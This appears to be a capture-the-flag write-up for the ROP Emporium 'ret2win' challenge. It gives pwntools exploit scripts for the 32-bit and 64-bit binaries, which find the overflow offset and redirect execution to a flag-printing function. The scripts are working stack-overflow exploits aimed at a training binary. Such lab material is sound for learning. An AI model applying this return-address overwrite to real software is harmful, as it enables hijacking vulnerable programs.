ret2win

ret2win 32bit

Solution

This is a typical ret2text challenge. There is an unused function ret2win located in the .text segment that calls system("/bin/cat flag.txt") for us. This is sometimes called "dead code".

Exploit

#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="i386", os="linux")
elf = ELF("ret2win32", checksec=False)

#--------Offset--------#

p = elf.process()
pattern = cyclic(1024)
p.sendlineafter("> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
offset = cyclic_find(core.eip)

log.info(f"{offset = }")

#--------ret2text--------#

ret2win = elf.sym["ret2win"]

payload = flat(
    b"A" * offset,
    ret2win,
)

p = elf.process()

p.sendlineafter("> ", payload)

p.interactive()

ret2win 64bit

Solution

The idea is essentially the same as the 32-bit case.

Exploit

#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="amd64", os="linux")
elf = ELF("ret2win", checksec=False)

#-------Offset--------#

p = elf.process()
pattern = cyclic(1024)
p.sendlineafter("> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
offset = cyclic_find(core.read(core.rsp, 4))

log.info(f"{offset = }")

#--------ret2text--------#

ret2win = elf.sym["ret2win"]

payload = flat(
    b"A" * offset,
    ret2win,
)

p = elf.process()

p.sendlineafter("> ", payload)

p.interactive()

PreviousROP Emporium Nextsplit

Last updated 2 years ago